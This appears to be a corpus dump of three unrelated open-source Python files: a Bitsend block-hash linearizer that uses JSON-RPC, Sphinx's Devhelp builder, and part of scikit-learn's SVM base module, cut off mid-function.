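# i.e. the hex string is split into byte pairs and the pair order reversed.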
class BitsendRPC:
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
authpair = authpair.encode('utf-8')
self.authhdr = b"Basic " + base64.b64encode(authpair)
self.conn = httplib.HTTPConnection(host, port=port, timeout=30)
def execute(self, obj):
try:
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
except ConnectionRefusedError:
print('RPC connection refused. Check RPC settings and the server status.',
file=sys.stderr)
return None
resp = self.conn.getresponse()
if resp is None:
print("JSON-RPC: no response", file=sys.stderr)
return None
body = resp.read().decode('utf-8')
resp_obj = json.loads(body)
return resp_obj
@staticmethod
def build_request(idx, method, params):
obj = { 'version' : '1.1',
'method' : method,
'id' : idx }
if params is None:
obj['params'] = []
else:
obj['params'] = params
return obj
@staticmethod
def response_is_error(resp_obj):
return 'error' in resp_obj and resp_obj['error'] is not None
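# A minimal usage sketch (added; the host/port/credentials below are
# placeholders -- real values come from the config file parsed in __main__):
#   rpc = BitsendRPC('127.0.0.1', 8800, 'user', 'pass')
#   reply = rpc.execute([BitsendRPC.build_request(0, 'getblockhash', [0])])
#   # on success, reply[0]['result'] is the hash of block 0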
def get_block_hashes(settings, max_blocks_per_call=10000):
rpc = BitsendRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpassword'])
height = settings['min_height']
while height < settings['max_height']+1:
num_blocks = min(settings['max_height']+1-height, max_blocks_per_call)
batch = []
for x in range(num_blocks):
batch.append(rpc.build_request(x, 'getblockhash', [height + x]))
reply = rpc.execute(batch)
if reply is None:
print('Cannot continue. Program will halt.')
return None
for x,resp_obj in enumerate(reply):
if rpc.response_is_error(resp_obj):
print('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr)
exit(1)
assert(resp_obj['id'] == x) # assume replies are in-sequence
if settings['rev_hash_bytes'] == 'true':
resp_obj['result'] = hex_switchEndian(resp_obj['result'])
print(resp_obj['result'])
height += num_blocks
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: linearize-hashes.py CONFIG-FILE")
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'min_height' not in settings:
settings['min_height'] = 0
if 'max_height' not in settings:
settings['max_height'] = 313000
if 'rev_hash_bytes' not in settings:
settings['rev_hash_bytes'] = 'false'
if 'rpcuser' not in settings or 'rpcpassword' not in settings:
        print("Missing username and/or password in cfg file", file=sys.stderr)
sys.exit(1)
settings['port'] = int(settings['port'])
settings['min_height'] = int(settings['min_height'])
settings['max_height'] = int(settings['max_height'])
# Force hash byte format setting to be lowercase to make comparisons easier.
settings['rev_hash_bytes'] = settings['rev_hash_bytes'].lower()
get_block_hashes(settings)
| mit |
WhySoGeeky/DroidPot | venv/lib/python2.7/site-packages/sphinx/builders/devhelp.py | 4 | 4119 | # -*- coding: utf-8 -*-
"""
sphinx.builders.devhelp
~~~~~~~~~~~~~~~~~~~~~~~
Build HTML documentation and Devhelp_ support files.
.. _Devhelp: http://live.gnome.org/devhelp
:copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import absolute_import
import re
from os import path
from docutils import nodes
from sphinx import addnodes
from sphinx.builders.html import StandaloneHTMLBuilder
try:
import xml.etree.ElementTree as etree
except ImportError:
try:
import lxml.etree as etree
except ImportError:
try:
import elementtree.ElementTree as etree
except ImportError:
import cElementTree as etree
try:
import gzip
def comp_open(filename, mode='rb'):
return gzip.open(filename + '.gz', mode)
except ImportError:
def comp_open(filename, mode='rb'):
return open(filename, mode)
class DevhelpBuilder(StandaloneHTMLBuilder):
"""
    Builder that also outputs a GNOME Devhelp file.
"""
name = 'devhelp'
# don't copy the reST source
copysource = False
supported_image_types = ['image/png', 'image/gif', 'image/jpeg']
# don't add links
add_permalinks = False
# don't add sidebar etc.
embedded = True
def init(self):
StandaloneHTMLBuilder.init(self)
self.out_suffix = '.html'
def handle_finish(self):
self.build_devhelp(self.outdir, self.config.devhelp_basename)
def build_devhelp(self, outdir, outname):
self.info('dumping devhelp index...')
# Basic info
root = etree.Element('book',
title=self.config.html_title,
name=self.config.project,
link="index.html",
version=self.config.version)
tree = etree.ElementTree(root)
# TOC
chapters = etree.SubElement(root, 'chapters')
tocdoc = self.env.get_and_resolve_doctree(
self.config.master_doc, self, prune_toctrees=False)
def write_toc(node, parent):
if isinstance(node, addnodes.compact_paragraph) or \
isinstance(node, nodes.bullet_list):
for subnode in node:
write_toc(subnode, parent)
elif isinstance(node, nodes.list_item):
item = etree.SubElement(parent, 'sub')
for subnode in node:
write_toc(subnode, item)
elif isinstance(node, nodes.reference):
parent.attrib['link'] = node['refuri']
parent.attrib['name'] = node.astext().encode('utf-8')
def istoctree(node):
return isinstance(node, addnodes.compact_paragraph) and \
'toctree' in node
for node in tocdoc.traverse(istoctree):
write_toc(node, chapters)
# Index
functions = etree.SubElement(root, 'functions')
index = self.env.create_index(self)
def write_index(title, refs, subitems):
if len(refs) == 0:
pass
elif len(refs) == 1:
etree.SubElement(functions, 'function',
name=title, link=refs[0][1])
else:
for i, ref in enumerate(refs):
etree.SubElement(functions, 'function',
name="[%d] %s" % (i, title),
link=ref[1])
if subitems:
parent_title = re.sub(r'\s*\(.*\)\s*$', '', title)
for subitem in subitems:
write_index("%s %s" % (parent_title, subitem[0]),
subitem[1], [])
for (key, group) in index:
for title, (refs, subitems) in group:
write_index(title, refs, subitems)
# Dump the XML file
f = comp_open(path.join(outdir, outname + '.devhelp'), 'w')
try:
tree.write(f)
finally:
f.close()
| mit |
pv/scikit-learn | sklearn/svm/base.py | 156 | 36018 | from __future__ import print_function
import numpy as np
import scipy.sparse as sp
import warnings
from abc import ABCMeta, abstractmethod
from . import libsvm, liblinear
from . import libsvm_sparse
from ..base import BaseEstimator, ClassifierMixin, ChangedBehaviorWarning
from ..preprocessing import LabelEncoder
from ..multiclass import _ovr_decision_function
from ..utils import check_array, check_random_state, column_or_1d
from ..utils import ConvergenceWarning, compute_class_weight, deprecated
from ..utils.extmath import safe_sparse_dot
from ..utils.validation import check_is_fitted, NotFittedError
from ..externals import six
LIBSVM_IMPL = ['c_svc', 'nu_svc', 'one_class', 'epsilon_svr', 'nu_svr']
def _one_vs_one_coef(dual_coef, n_support, support_vectors):
"""Generate primal coefficients from dual coefficients
for the one-vs-one multi class LibSVM in the case
of a linear kernel."""
    # get 1vs1 weights for all n * (n - 1) / 2 pairwise classifiers.
    # this is somewhat messy.
    # shape of dual_coef_ is (n_classes - 1, n_SV)
    # see docs for details
n_class = dual_coef.shape[0] + 1
# XXX we could do preallocation of coef but
# would have to take care in the sparse case
coef = []
sv_locs = np.cumsum(np.hstack([[0], n_support]))
for class1 in range(n_class):
# SVs for class1:
sv1 = support_vectors[sv_locs[class1]:sv_locs[class1 + 1], :]
for class2 in range(class1 + 1, n_class):
# SVs for class1:
sv2 = support_vectors[sv_locs[class2]:sv_locs[class2 + 1], :]
# dual coef for class1 SVs:
alpha1 = dual_coef[class2 - 1, sv_locs[class1]:sv_locs[class1 + 1]]
# dual coef for class2 SVs:
alpha2 = dual_coef[class1, sv_locs[class2]:sv_locs[class2 + 1]]
# build weight for class1 vs class2
coef.append(safe_sparse_dot(alpha1, sv1)
+ safe_sparse_dot(alpha2, sv2))
return coef
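# Note (added for illustration): for n_class classes the loop above yields
# n_class * (n_class - 1) / 2 primal weight vectors, in the pairwise order
# (0 vs 1), (0 vs 2), ..., (1 vs 2), ... -- matching LibSVM's one-vs-one
# ordering of decision values.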
class BaseLibSVM(six.with_metaclass(ABCMeta, BaseEstimator)):
"""Base class for estimators that use libsvm as backing library
This implements support vector machine classification and regression.
Parameter documentation is in the derived `SVC` class.
"""
# The order of these must match the integer values in LibSVM.
# XXX These are actually the same in the dense case. Need to factor
# this out.
_sparse_kernels = ["linear", "poly", "rbf", "sigmoid", "precomputed"]
@abstractmethod
def __init__(self, impl, kernel, degree, gamma, coef0,
tol, C, nu, epsilon, shrinking, probability, cache_size,
class_weight, verbose, max_iter, random_state):
if impl not in LIBSVM_IMPL: # pragma: no cover
raise ValueError("impl should be one of %s, %s was given" % (
LIBSVM_IMPL, impl))
# FIXME Remove gamma=0.0 support in 0.18
if gamma == 0:
msg = ("gamma=%s has been deprecated in favor of "
"gamma='%s' as of 0.17. Backward compatibility"
" for gamma=%s will be removed in %s")
invalid_gamma = 0.0
warnings.warn(msg % (invalid_gamma, "auto", invalid_gamma, "0.18"),
DeprecationWarning)
self._impl = impl
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.tol = tol
self.C = C
self.nu = nu
self.epsilon = epsilon
self.shrinking = shrinking
self.probability = probability
self.cache_size = cache_size
self.class_weight = class_weight
self.verbose = verbose
self.max_iter = max_iter
self.random_state = random_state
@property
def _pairwise(self):
# Used by cross_val_score.
kernel = self.kernel
return kernel == "precomputed" or callable(kernel)
def fit(self, X, y, sample_weight=None):
"""Fit the SVM model according to the given training data.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
For kernel="precomputed", the expected shape of X is
(n_samples, n_samples).
y : array-like, shape (n_samples,)
Target values (class labels in classification, real numbers in
regression)
sample_weight : array-like, shape (n_samples,)
Per-sample weights. Rescale C per sample. Higher weights
force the classifier to put more emphasis on these points.
Returns
-------
self : object
Returns self.
Notes
------
If X and y are not C-ordered and contiguous arrays of np.float64 and
X is not a scipy.sparse.csr_matrix, X and/or y may be copied.
If X is a dense array, then the other methods will not support sparse
matrices as input.
"""
rnd = check_random_state(self.random_state)
sparse = sp.isspmatrix(X)
if sparse and self.kernel == "precomputed":
raise TypeError("Sparse precomputed kernels are not supported.")
self._sparse = sparse and not callable(self.kernel)
X = check_array(X, accept_sparse='csr', dtype=np.float64, order='C')
y = self._validate_targets(y)
sample_weight = np.asarray([]
if sample_weight is None
else sample_weight, dtype=np.float64)
solver_type = LIBSVM_IMPL.index(self._impl)
# input validation
if solver_type != 2 and X.shape[0] != y.shape[0]:
raise ValueError("X and y have incompatible shapes.\n" +
"X has %s samples, but y has %s." %
(X.shape[0], y.shape[0]))
if self.kernel == "precomputed" and X.shape[0] != X.shape[1]:
raise ValueError("X.shape[0] should be equal to X.shape[1]")
if sample_weight.shape[0] > 0 and sample_weight.shape[0] != X.shape[0]:
raise ValueError("sample_weight and X have incompatible shapes: "
"%r vs %r\n"
"Note: Sparse matrices cannot be indexed w/"
"boolean masks (use `indices=True` in CV)."
% (sample_weight.shape, X.shape))
# FIXME remove (self.gamma == 0) in 0.18
if (self.kernel in ['poly', 'rbf']) and ((self.gamma == 0) or
(self.gamma == 'auto')):
# if custom gamma is not provided ...
self._gamma = 1.0 / X.shape[1]
elif self.gamma == 'auto':
self._gamma = 0.0
else:
self._gamma = self.gamma
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
fit = self._sparse_fit if self._sparse else self._dense_fit
if self.verbose: # pragma: no cover
print('[LibSVM]', end='')
seed = rnd.randint(np.iinfo('i').max)
fit(X, y, sample_weight, solver_type, kernel, random_seed=seed)
# see comment on the other call to np.iinfo in this file
self.shape_fit_ = X.shape
# In binary case, we need to flip the sign of coef, intercept and
# decision function. Use self._intercept_ and self._dual_coef_ internally.
self._intercept_ = self.intercept_.copy()
self._dual_coef_ = self.dual_coef_
if self._impl in ['c_svc', 'nu_svc'] and len(self.classes_) == 2:
self.intercept_ *= -1
self.dual_coef_ = -self.dual_coef_
return self
def _validate_targets(self, y):
"""Validation of y and class_weight.
Default implementation for SVR and one-class; overridden in BaseSVC.
"""
# XXX this is ugly.
# Regression models should not have a class_weight_ attribute.
self.class_weight_ = np.empty(0)
return column_or_1d(y, warn=True).astype(np.float64)
def _warn_from_fit_status(self):
assert self.fit_status_ in (0, 1)
if self.fit_status_ == 1:
warnings.warn('Solver terminated early (max_iter=%i).'
' Consider pre-processing your data with'
' StandardScaler or MinMaxScaler.'
% self.max_iter, ConvergenceWarning)
def _dense_fit(self, X, y, sample_weight, solver_type, kernel,
random_seed):
if callable(self.kernel):
# you must store a reference to X to compute the kernel in predict
# TODO: add keyword copy to copy on demand
self.__Xfit = X
X = self._compute_kernel(X)
if X.shape[0] != X.shape[1]:
raise ValueError("X.shape[0] should be equal to X.shape[1]")
libsvm.set_verbosity_wrap(self.verbose)
# we don't pass **self.get_params() to allow subclasses to
# add other parameters to __init__
self.support_, self.support_vectors_, self.n_support_, \
self.dual_coef_, self.intercept_, self.probA_, \
self.probB_, self.fit_status_ = libsvm.fit(
X, y,
svm_type=solver_type, sample_weight=sample_weight,
class_weight=self.class_weight_, kernel=kernel, C=self.C,
nu=self.nu, probability=self.probability, degree=self.degree,
shrinking=self.shrinking, tol=self.tol,
cache_size=self.cache_size, coef0=self.coef0,
gamma=self._gamma, epsilon=self.epsilon,
max_iter=self.max_iter, random_seed=random_seed)
self._warn_from_fit_status()
def _sparse_fit(self, X, y, sample_weight, solver_type, kernel,
random_seed):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
X.sort_indices()
kernel_type = self._sparse_kernels.index(kernel)
libsvm_sparse.set_verbosity_wrap(self.verbose)
self.support_, self.support_vectors_, dual_coef_data, \
self.intercept_, self.n_support_, \
self.probA_, self.probB_, self.fit_status_ = \
libsvm_sparse.libsvm_sparse_train(
X.shape[1], X.data, X.indices, X.indptr, y, solver_type,
kernel_type, self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
sample_weight, self.nu, self.cache_size, self.epsilon,
int(self.shrinking), int(self.probability), self.max_iter,
random_seed)
self._warn_from_fit_status()
if hasattr(self, "classes_"):
n_class = len(self.classes_) - 1
else: # regression
n_class = 1
n_SV = self.support_vectors_.shape[0]
dual_coef_indices = np.tile(np.arange(n_SV), n_class)
dual_coef_indptr = np.arange(0, dual_coef_indices.size + 1,
dual_coef_indices.size / n_class)
self.dual_coef_ = sp.csr_matrix(
(dual_coef_data, dual_coef_indices, dual_coef_indptr),
(n_class, n_SV))
def predict(self, X):
"""Perform regression on samples in X.
For an one-class model, +1 or -1 is returned.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
(n_samples_test, n_samples_train).
Returns
-------
y_pred : array, shape (n_samples,)
"""
X = self._validate_for_predict(X)
predict = self._sparse_predict if self._sparse else self._dense_predict
return predict(X)
def _dense_predict(self, X):
n_samples, n_features = X.shape
X = self._compute_kernel(X)
if X.ndim == 1:
X = check_array(X, order='C')
kernel = self.kernel
if callable(self.kernel):
kernel = 'precomputed'
if X.shape[1] != self.shape_fit_[0]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of samples at training time" %
(X.shape[1], self.shape_fit_[0]))
svm_type = LIBSVM_IMPL.index(self._impl)
return libsvm.predict(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_, svm_type=svm_type, kernel=kernel,
degree=self.degree, coef0=self.coef0, gamma=self._gamma,
cache_size=self.cache_size)
def _sparse_predict(self, X):
# Precondition: X is a csr_matrix of dtype np.float64.
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
C = 0.0 # C is not useful here
return libsvm_sparse.libsvm_sparse_predict(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _compute_kernel(self, X):
"""Return the data transformed by a callable kernel"""
if callable(self.kernel):
# in the case of precomputed kernel given as a function, we
# have to compute explicitly the kernel matrix
kernel = self.kernel(X, self.__Xfit)
if sp.issparse(kernel):
kernel = kernel.toarray()
X = np.asarray(kernel, dtype=np.float64, order='C')
return X
@deprecated(" and will be removed in 0.19")
def decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train].
Returns
-------
X : array-like, shape (n_samples, n_class * (n_class-1) / 2)
Returns the decision function of the sample for each class
in the model.
"""
return self._decision_function(X)
def _decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Returns
-------
X : array-like, shape (n_samples, n_class * (n_class-1) / 2)
Returns the decision function of the sample for each class
in the model.
"""
# NOTE: _validate_for_predict contains check for is_fitted
# hence must be placed before any other attributes are used.
X = self._validate_for_predict(X)
X = self._compute_kernel(X)
if self._sparse:
dec_func = self._sparse_decision_function(X)
else:
dec_func = self._dense_decision_function(X)
# In binary case, we need to flip the sign of coef, intercept and
# decision function.
if self._impl in ['c_svc', 'nu_svc'] and len(self.classes_) == 2:
return -dec_func.ravel()
return dec_func
def _dense_decision_function(self, X):
X = check_array(X, dtype=np.float64, order="C")
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
return libsvm.decision_function(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_,
svm_type=LIBSVM_IMPL.index(self._impl),
kernel=kernel, degree=self.degree, cache_size=self.cache_size,
coef0=self.coef0, gamma=self._gamma)
def _sparse_decision_function(self, X):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
kernel = self.kernel
if hasattr(kernel, '__call__'):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
return libsvm_sparse.libsvm_sparse_decision_function(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _validate_for_predict(self, X):
check_is_fitted(self, 'support_')
X = check_array(X, accept_sparse='csr', dtype=np.float64, order="C")
if self._sparse and not sp.isspmatrix(X):
X = sp.csr_matrix(X)
if self._sparse:
X.sort_indices()
if sp.issparse(X) and not self._sparse and not callable(self.kernel):
raise ValueError(
"cannot use sparse input in %r trained on dense data"
% type(self).__name__)
n_samples, n_features = X.shape
if self.kernel == "precomputed":
if X.shape[1] != self.shape_fit_[0]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of samples at training time" %
(X.shape[1], self.shape_fit_[0]))
elif n_features != self.shape_fit_[1]:
raise ValueError("X.shape[1] = %d should be equal to %d, "
"the number of features at training time" %
(n_features, self.shape_fit_[1]))
return X
@property
def coef_(self):
if self.kernel != 'linear':
raise ValueError('coef_ is only available when using a '
'linear kernel')
coef = self._get_coef()
# coef_ being a read-only property, it's better to mark the value as
# immutable to avoid hiding potential bugs for the unsuspecting user.
if sp.issparse(coef):
# sparse matrix do not have global flags
coef.data.flags.writeable = False
else:
# regular dense array
coef.flags.writeable = False
return coef
def _get_coef(self):
return safe_sparse_dot(self._dual_coef_, self.support_vectors_)
class BaseSVC(six.with_metaclass(ABCMeta, BaseLibSVM, ClassifierMixin)):
"""ABC for LibSVM-based classifiers."""
@abstractmethod
def __init__(self, impl, kernel, degree, gamma, coef0, tol, C, nu,
shrinking, probability, cache_size, class_weight, verbose,
max_iter, decision_function_shape, random_state):
self.decision_function_shape = decision_function_shape
super(BaseSVC, self).__init__(
impl=impl, kernel=kernel, degree=degree, gamma=gamma, coef0=coef0,
tol=tol, C=C, nu=nu, epsilon=0., shrinking=shrinking,
probability=probability, cache_size=cache_size,
class_weight=class_weight, verbose=verbose, max_iter=max_iter,
random_state=random_state)
def _validate_targets(self, y):
y_ = column_or_1d(y, warn=True)
cls, y = np.unique(y_, return_inverse=True)
self.class_weight_ = compute_class_weight(self.class_weight, cls, y_)
if len(cls) < 2:
raise ValueError(
"The number of classes has to be greater than one; got %d"
% len(cls))
self.classes_ = cls
return np.asarray(y, dtype=np.float64, order='C')
def decision_function(self, X):
"""Distance of the samples X to the separating hyperplane.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Returns
-------
X : array-like, shape (n_samples, n_classes * (n_classes-1) / 2)
Returns the decision function of the sample for each class
in the model.
If decision_function_shape='ovr', the shape is (n_samples,
n_classes)
"""
dec = self._decision_function(X)
if self.decision_function_shape is None and len(self.classes_) > 2:
warnings.warn("The decision_function_shape default value will "
"change from 'ovo' to 'ovr' in 0.18. This will change "
"the shape of the decision function returned by "
"SVC.", ChangedBehaviorWarning)
if self.decision_function_shape == 'ovr':
return _ovr_decision_function(dec < 0, dec, len(self.classes_))
return dec
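    # Note (added): with k classes the raw LibSVM decision values have
    # k * (k - 1) / 2 one-vs-one columns; _ovr_decision_function aggregates
    # the pairwise votes and confidences into k per-class scores for the
    # 'ovr' shape.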
def predict(self, X):
"""Perform classification on samples in X.
For an one-class model, +1 or -1 is returned.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
y_pred : array, shape (n_samples,)
Class labels for samples in X.
"""
y = super(BaseSVC, self).predict(X)
return self.classes_.take(np.asarray(y, dtype=np.intp))
# Hacky way of getting predict_proba to raise an AttributeError when
# probability=False using properties. Do not use this in new code; when
# probabilities are not available depending on a setting, introduce two
# estimators.
def _check_proba(self):
if not self.probability:
raise AttributeError("predict_proba is not available when "
" probability=False")
if self._impl not in ('c_svc', 'nu_svc'):
raise AttributeError("predict_proba only implemented for SVC"
" and NuSVC")
@property
def predict_proba(self):
"""Compute probabilities of possible outcomes for samples in X.
The model need to have probability information computed at training
time: fit with attribute `probability` set to True.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
T : array-like, shape (n_samples, n_classes)
Returns the probability of the sample for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute `classes_`.
Notes
-----
The probability model is created using cross validation, so
the results can be slightly different than those obtained by
predict. Also, it will produce meaningless results on very small
datasets.
"""
self._check_proba()
return self._predict_proba
def _predict_proba(self, X):
X = self._validate_for_predict(X)
if self.probA_.size == 0 or self.probB_.size == 0:
raise NotFittedError("predict_proba is not available when fitted "
"with probability=False")
pred_proba = (self._sparse_predict_proba
if self._sparse else self._dense_predict_proba)
return pred_proba(X)
@property
def predict_log_proba(self):
"""Compute log probabilities of possible outcomes for samples in X.
The model need to have probability information computed at training
time: fit with attribute `probability` set to True.
Parameters
----------
X : array-like, shape (n_samples, n_features)
For kernel="precomputed", the expected shape of X is
[n_samples_test, n_samples_train]
Returns
-------
T : array-like, shape (n_samples, n_classes)
Returns the log-probabilities of the sample for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute `classes_`.
Notes
-----
The probability model is created using cross validation, so
the results can be slightly different than those obtained by
predict. Also, it will produce meaningless results on very small
datasets.
"""
self._check_proba()
return self._predict_log_proba
def _predict_log_proba(self, X):
return np.log(self.predict_proba(X))
def _dense_predict_proba(self, X):
X = self._compute_kernel(X)
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
svm_type = LIBSVM_IMPL.index(self._impl)
pprob = libsvm.predict_proba(
X, self.support_, self.support_vectors_, self.n_support_,
self._dual_coef_, self._intercept_,
self.probA_, self.probB_,
svm_type=svm_type, kernel=kernel, degree=self.degree,
cache_size=self.cache_size, coef0=self.coef0, gamma=self._gamma)
return pprob
def _sparse_predict_proba(self, X):
X.data = np.asarray(X.data, dtype=np.float64, order='C')
kernel = self.kernel
if callable(kernel):
kernel = 'precomputed'
kernel_type = self._sparse_kernels.index(kernel)
return libsvm_sparse.libsvm_sparse_predict_proba(
X.data, X.indices, X.indptr,
self.support_vectors_.data,
self.support_vectors_.indices,
self.support_vectors_.indptr,
self._dual_coef_.data, self._intercept_,
LIBSVM_IMPL.index(self._impl), kernel_type,
self.degree, self._gamma, self.coef0, self.tol,
self.C, self.class_weight_,
self.nu, self.epsilon, self.shrinking,
self.probability, self.n_support_,
self.probA_, self.probB_)
def _get_coef(self):
if self.dual_coef_.shape[0] == 1:
# binary classifier
coef = safe_sparse_dot(self.dual_coef_, self.support_vectors_)
else:
# 1vs1 classifier
coef = _one_vs_one_coef(self.dual_coef_, self.n_support_,
self.support_vectors_)
if sp.issparse(coef[0]):
coef = sp.vstack(coef).tocsr()
else:
coef = np.vstack(coef)
return coef
def _get_liblinear_solver_type(multi_class, penalty, loss, dual):
"""Find the liblinear magic number for the solver.
This number depends on the values of the following attributes:
- multi_class
- penalty
- loss
- dual
The same number is also internally used by LibLinear to determine
which solver to use.
"""
# nested dicts containing level 1: available loss functions,
    # level 2: available penalties for the given loss function,
    # level 3: whether the dual solver is available for the specified
# combination of loss function and penalty
_solver_type_dict = {
'logistic_regression': {
'l1': {False: 6},
'l2': {False: 0, True: 7}},
'hinge': {
'l2': {True: 3}},
'squared_hinge': {
'l1': {False: 5},
'l2': {False: 2, True: 1}},
'epsilon_insensitive': {
'l2': {True: 13}},
'squared_epsilon_insensitive': {
'l2': {False: 11, True: 12}},
'crammer_singer': 4
}
if multi_class == 'crammer_singer':
return _solver_type_dict[multi_class]
elif multi_class != 'ovr':
raise ValueError("`multi_class` must be one of `ovr`, "
"`crammer_singer`, got %r" % multi_class)
# FIXME loss.lower() --> loss in 0.18
_solver_pen = _solver_type_dict.get(loss.lower(), None)
if _solver_pen is None:
error_string = ("loss='%s' is not supported" % loss)
else:
        # FIXME penalty.lower() --> penalty in 0.18
_solver_dual = _solver_pen.get(penalty.lower(), None)
if _solver_dual is None:
error_string = ("The combination of penalty='%s' "
"and loss='%s' is not supported"
% (penalty, loss))
else:
solver_num = _solver_dual.get(dual, None)
if solver_num is None:
error_string = ("The combination of penalty='%s' and "
"loss='%s' are not supported when dual=%s"
% (penalty, loss, dual))
else:
return solver_num
raise ValueError('Unsupported set of arguments: %s, '
'Parameters: penalty=%r, loss=%r, dual=%r'
% (error_string, penalty, loss, dual))
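# A small worked example (added; uses LinearSVC's default options):
#   _get_liblinear_solver_type('ovr', 'l2', 'squared_hinge', True) == 1
# which is liblinear's L2-regularized L2-loss SVC solved in the dual.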
def _fit_liblinear(X, y, C, fit_intercept, intercept_scaling, class_weight,
penalty, dual, verbose, max_iter, tol,
random_state=None, multi_class='ovr',
loss='logistic_regression', epsilon=0.1):
"""Used by Logistic Regression (and CV) and LinearSVC.
Preprocessing is done in this function before supplying it to liblinear.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
        Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples,)
Target vector relative to X
C : float
        Inverse of regularization strength; the lower the C, the stronger
        the penalization.
fit_intercept : bool
        Whether or not to fit the intercept, that is, to add an intercept
        term to the decision function.
intercept_scaling : float
LibLinear internally penalizes the intercept and this term is subject
to regularization just like the other terms of the feature vector.
        In order to avoid this, one should increase intercept_scaling,
        such that the feature vector becomes [x, intercept_scaling].
class_weight : {dict, 'balanced'}, optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
penalty : str, {'l1', 'l2'}
The norm of the penalty used in regularization.
dual : bool
        Dual or primal formulation.
verbose : int
Set verbose to any positive number for verbosity.
max_iter : int
Number of iterations.
tol : float
Stopping condition.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
multi_class : str, {'ovr', 'crammer_singer'}
`ovr` trains n_classes one-vs-rest classifiers, while `crammer_singer`
optimizes a joint objective over all classes.
        While `crammer_singer` is interesting from a theoretical perspective
        as it is consistent, it is seldom used in practice, rarely leads to
        better accuracy, and is more expensive to compute.
If `crammer_singer` is chosen, the options loss, penalty and dual will
be ignored.
loss : str, {'logistic_regression', 'hinge', 'squared_hinge',
                 'epsilon_insensitive', 'squared_epsilon_insensitive'}
The loss function used to fit the model.
epsilon : float, optional (default=0.1)
Epsilon parameter in the epsilon-insensitive loss function. Note
that the value of this parameter depends on the scale of the target
variable y. If unsure, set epsilon=0.
Returns
-------
coef_ : ndarray, shape (n_features, n_features + 1)
        The coefficient vector obtained by minimizing the objective function.
intercept_ : float
The intercept term added to the vector.
n_iter_ : int
Maximum number of iterations run across all classes.
"""
# FIXME Remove case insensitivity in 0.18 ---------------------
loss_l, penalty_l = loss.lower(), penalty.lower()
msg = ("loss='%s' has been deprecated in favor of "
"loss='%s' as of 0.16. Backward compatibility"
" for the uppercase notation will be removed in %s")
if (not loss.islower()) and loss_l not in ('l1', 'l2'):
warnings.warn(msg % (loss, loss_l, "0.18"),
DeprecationWarning)
if not penalty.islower():
warnings.warn(msg.replace("loss", "penalty")
% (penalty, penalty_l, "0.18"),
DeprecationWarning)
# -------------------------------------------------------------
# FIXME loss_l --> loss in 0.18
if loss_l not in ['epsilon_insensitive', 'squared_epsilon_insensitive']:
enc = LabelEncoder()
y_ind = enc.fit_transform(y)
classes_ = enc.classes_
if len(classes_) < 2:
raise ValueError("This solver needs samples of at least 2 classes"
" in the data, but the data contains only one"
" class: %r" % classes_[0])
